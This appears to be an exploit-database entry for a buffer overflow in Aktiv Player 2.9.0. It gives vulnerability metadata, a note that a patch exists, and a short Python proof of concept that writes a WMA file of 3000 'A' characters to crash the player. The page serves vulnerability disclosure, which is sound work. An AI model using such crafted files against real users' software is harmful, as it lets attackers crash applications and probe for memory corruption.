header-logo
Suggest Exploit
vendor:
Aktiv Player
by:
metacom
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Aktiv Player
Affected Version From: 2.9.0
Affected Version To: 2.9.0
Patch Exists: YES
Related CWE: N/A
CPE: a:goforsharing:aktiv_player:2.9.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 German
2020

aktiv-player version 2.9.0 Crash PoC

This exploit is a proof-of-concept for a buffer overflow vulnerability in aktiv-player version 2.9.0. The exploit is triggered by creating a malicious WMA file containing 3000 'A' characters, which causes the application to crash when the file is opened.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

# !/usr/bin/python
# Exploit Title: aktiv-player version 2.9.0 Crash PoC
# Exploit Author: metacom
# RST 
# Vendor Homepage: http://www.goforsharing.com/home-mainmenu-1/aktiv-player-mainmenu-131.html
# Tested on: Windows 7 German

filename = "poc.wma"

buffer = "\x41" * 3000
exploit = buffer 
 
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()